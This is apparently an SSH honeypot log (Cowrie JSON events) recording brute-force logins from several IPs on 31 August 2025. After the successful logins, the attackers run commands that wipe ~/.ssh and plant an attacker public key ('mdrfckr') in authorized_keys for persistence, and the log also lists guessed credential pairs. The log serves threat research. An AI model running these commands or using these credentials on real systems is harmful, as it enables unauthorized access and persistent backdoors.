{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:12.231865Z","src_ip":"212.227.235.229","session":"38abad80ed63"}
{"eventid":"cowrie.login.success","username":"root","password":"3245gs5662d34","message":"login attempt [root/3245gs5662d34] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:13.424862Z","src_ip":"212.227.235.229","session":"38abad80ed63"}
{"eventid":"cowrie.session.closed","duration":"1.8","message":"Connection lost after 1.8 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:13.714051Z","src_ip":"212.227.235.229","session":"38abad80ed63"}
{"eventid":"cowrie.session.closed","duration":"8.4","message":"Connection lost after 8.4 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:13.714954Z","src_ip":"212.227.235.229","session":"13fc7a59f59b"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:58:14.360164Z","src_ip":"212.227.125.160","session":"446b9cf0ba24"}
{"eventid":"cowrie.client.kex","hassh":"0a07365cc01fa9fc82608ba4019af499","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,aes128-ctr,aes192-ctr,aes256-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["rsa-sha2-256-cert-v01@openssh.com","rsa-sha2-512-cert-v01@openssh.com","ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","rsa-sha2-256","rsa-sha2-512","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","aes128-ctr","aes192-ctr","aes256-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 0a07365cc01fa9fc82608ba4019af499","sensor":"my-vps","timestamp":"2025-08-31T05:58:14.360882Z","src_ip":"212.227.125.160","session":"446b9cf0ba24"}
{"eventid":"cowrie.login.failed","username":"steam","password":"steam123","message":"login attempt [steam/steam123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:14.498864Z","src_ip":"212.227.235.229","session":"88ce29d10efe"}
{"eventid":"cowrie.login.failed","username":"update","password":"update123","message":"login attempt [update/update123] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:16.064932Z","src_ip":"212.227.235.229","session":"36eaca8bdd17"}
{"eventid":"cowrie.session.closed","duration":"13.7","message":"Connection lost after 13.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:17.765059Z","src_ip":"212.227.235.229","session":"36eaca8bdd17"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":45660,"dst_ip":"1.2.3.4","dst_port":22,"session":"bfa8062ff5e8","protocol":"ssh","message":"New connection: 212.227.235.229:45660 (1.2.3.4:22) [session: bfa8062ff5e8]","sensor":"my-vps","timestamp":"2025-08-31T05:58:18.040388Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-31T05:58:18.782540Z","src_ip":"212.227.235.229","session":"bfa8062ff5e8"}
{"eventid":"cowrie.client.kex","hassh":"2ec37a7cc8daf20b10e1ad6221061ca5","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group-exchange-sha256,diffie-hellman-group-exchange-sha1,diffie-hellman-group16-sha512,diffie-hellman-group14-sha256,diffie-hellman-group14-sha1,diffie-hellman-group1-sha1,ext-info-c,kex-strict-c-v00@openssh.com;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,aes256-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,3des-cbc,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group-exchange-sha256","diffie-hellman-group-exchange-sha1","diffie-hellman-group16-sha512","diffie-hellman-group14-sha256","diffie-hellman-group14-sha1","diffie-hellman-group1-sha1","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-rsa","rsa-sha2-256","rsa-sha2-512","ssh-dss","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","aes256-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","3des-cbc","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 2ec37a7cc8daf20b10e1ad6221061ca5","sensor":"my-vps","timestamp":"2025-08-31T05:58:18.783496Z","src_ip":"212.227.235.229","session":"bfa8062ff5e8"}
{"eventid":"cowrie.session.closed","duration":"53.3","message":"Connection lost after 53.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:21.171958Z","src_ip":"212.227.235.229","session":"88ce29d10efe"}
{"eventid":"cowrie.login.failed","username":"test3","password":"12345678","message":"login attempt [test3/12345678] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:24.886090Z","src_ip":"212.227.235.229","session":"bfa8062ff5e8"}
{"eventid":"cowrie.login.failed","username":"es","password":"es","message":"login attempt [es/es] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:25.273263Z","src_ip":"212.227.125.160","session":"446b9cf0ba24"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":57364,"dst_ip":"1.2.3.4","dst_port":22,"session":"2ca4b7260ea9","protocol":"ssh","message":"New connection: 170.64.166.123:57364 (1.2.3.4:22) [session: 2ca4b7260ea9]","sensor":"my-vps","timestamp":"2025-08-31T05:58:26.503877Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:26.504620Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.closed","duration":"8.7","message":"Connection lost after 8.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:26.737390Z","src_ip":"212.227.235.229","session":"bfa8062ff5e8"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:26.779092Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.closed","duration":"16.3","message":"Connection lost after 16.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:27.123158Z","src_ip":"212.227.125.160","session":"446b9cf0ba24"}
{"eventid":"cowrie.login.success","username":"root","password":"abc.123","message":"login attempt [root/abc.123] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:27.920723Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:28.489754Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:28.490421Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:28.491217Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:28.767291Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:29.373531Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.374205Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.650740Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.651583Z","src_ip":"170.64.166.123","session":"2ca4b7260ea9"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36182,"dst_ip":"1.2.3.4","dst_port":22,"session":"6fef1323349a","protocol":"ssh","message":"New connection: 212.227.235.229:36182 (1.2.3.4:22) [session: 6fef1323349a]","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.703724Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.704386Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":57370,"dst_ip":"1.2.3.4","dst_port":22,"session":"a65803ca0bf6","protocol":"ssh","message":"New connection: 170.64.166.123:57370 (1.2.3.4:22) [session: a65803ca0bf6]","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.924054Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.924907Z","src_ip":"170.64.166.123","session":"a65803ca0bf6"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:29.983393Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:30.200215Z","src_ip":"170.64.166.123","session":"a65803ca0bf6"}
{"eventid":"cowrie.login.success","username":"root","password":"Password123.","message":"login attempt [root/Password123.] succeeded","sensor":"my-vps","timestamp":"2025-08-31T05:58:31.142821Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.login.failed","username":"345gs5662d34","password":"345gs5662d34","message":"login attempt [345gs5662d34/345gs5662d34] failed","sensor":"my-vps","timestamp":"2025-08-31T05:58:31.339055Z","src_ip":"170.64.166.123","session":"a65803ca0bf6"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:32.116252Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.command.input","input":"cd ~; chattr -ia .ssh; lockr -ia .ssh","message":"CMD: cd ~; chattr -ia .ssh; lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.116962Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.command.failed","input":"lockr -ia .ssh","message":"Command not found: lockr -ia .ssh","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.118023Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","size":32,"shasum":"c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/c32b4937ce8564ea904a3bd2cb64805500ddfd28952a90fd55cb3c85d0be7644 after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.398973Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.session.closed","duration":"2.7","message":"Connection lost after 2.7 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.615333Z","src_ip":"170.64.166.123","session":"a65803ca0bf6"}
{"eventid":"cowrie.session.connect","src_ip":"170.64.166.123","src_port":57374,"dst_ip":"1.2.3.4","dst_port":22,"session":"d3787271fe91","protocol":"ssh","message":"New connection: 170.64.166.123:57374 (1.2.3.4:22) [session: d3787271fe91]","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.894991Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.895900Z","src_ip":"170.64.166.123","session":"d3787271fe91"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-31T05:58:32.976677Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.command.input","input":"cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","message":"CMD: cd ~ && rm -rf .ssh && mkdir .ssh && echo \"ssh-rsa AAAAB3NzaC1yc2EAAAABJQAAAQEArDp4cun2lhr4KUhBGE7VvAcwdli2a8dbnrTOrbMz1+5O73fcBOx8NVbUT0bUanUV9tJ2/9p7+vD0EpZ3Tz/+0kX34uAx1RV/75GVOmNx+9EuWOnvNoaJe0QXxziIg9eLBHpgLMuakb5+BgTFB+rKJAw9u9FSTDengvS8hX1kNFS4Mjux0hJOK8rvcEmPecjdySYMb66nylAKGwCEE6WEQHmd1mUPgHwGQ0hWCwsQk13yCGPK5w6hYp5zYkFnvlC8hGmd4Ww+u97k6pfTGTUbJk14ujvcD9iUKQTTWYYjIIu5PmUux5bsZ0R4WFwdIe6+i6rBLAsPKgAySVKPRK+oRw== mdrfckr\">>.ssh/authorized_keys && chmod -R go= ~/.ssh && cd ~","sensor":"my-vps","timestamp":"2025-08-31T05:58:32.977335Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.client.kex","hassh":"03a80b21afa810682a776a7d42e5e6fb","hasshAlgorithms":"curve25519-sha256,curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group18-sha512,diffie-hellman-group16-sha512,diffie-hellman-group-exchange-sha256,diffie-hellman-group14-sha256,ext-info-c,kex-strict-c-v00@openssh.com;chacha20-poly1305@openssh.com,aes256-gcm@openssh.com,aes128-gcm@openssh.com,aes256-ctr,aes192-ctr,aes128-ctr;hmac-sha2-256-etm@openssh.com,hmac-sha2-512-etm@openssh.com,hmac-sha2-256,hmac-sha2-512;none,zlib@openssh.com","kexAlgs":["curve25519-sha256","curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group18-sha512","diffie-hellman-group16-sha512","diffie-hellman-group-exchange-sha256","diffie-hellman-group14-sha256","ext-info-c","kex-strict-c-v00@openssh.com"],"keyAlgs":["ssh-ed25519","ecdsa-sha2-nistp521","ecdsa-sha2-nistp384","ecdsa-sha2-nistp256","sk-ssh-ed25519@openssh.com","sk-ecdsa-sha2-nistp256@openssh.com","rsa-sha2-512","rsa-sha2-256"],"encCS":["chacha20-poly1305@openssh.com","aes256-gcm@openssh.com","aes128-gcm@openssh.com","aes256-ctr","aes192-ctr","aes128-ctr"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-512-etm@openssh.com","hmac-sha2-256","hmac-sha2-512"],"compCS":["none","zlib@openssh.com"],"langCS":[""],"message":"SSH client hassh fingerprint: 03a80b21afa810682a776a7d42e5e6fb","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.176231Z","src_ip":"170.64.166.123","session":"d3787271fe91"}
{"eventid":"cowrie.session.file_download","duplicate":true,"outfile":"var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","shasum":"a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","destfile":"/root/.ssh/authorized_keys","message":"Saved redir contents with SHA-256 a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2 to var/lib/cowrie/downloads/a8460f446be540410004b1a8db4083773fa46f7fe76fa84219c93daa1669f8f2","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.259060Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","size":0,"shasum":"cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f","duplicate":true,"duration":"0.3","message":"Closing TTY Log: var/lib/cowrie/tty/cc1eb03e9b5926d8076e25826664a04400de854bf5cc660fa35eb86cbdf7dc0f after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.260153Z","src_ip":"212.227.235.229","session":"6fef1323349a"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.235.229","src_port":36198,"dst_ip":"1.2.3.4","dst_port":22,"session":"4ea0bf939504","protocol":"ssh","message":"New connection: 212.227.235.229:36198 (1.2.3.4:22) [session: 4ea0bf939504]","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.528333Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-libssh_0.11.1","message":"Remote SSH version: SSH-2.0-libssh_0.11.1","sensor":"my-vps","timestamp":"2025-08-31T05:58:33.529278Z","src_ip":"212.227.235.229","session":"4ea0bf939504"}
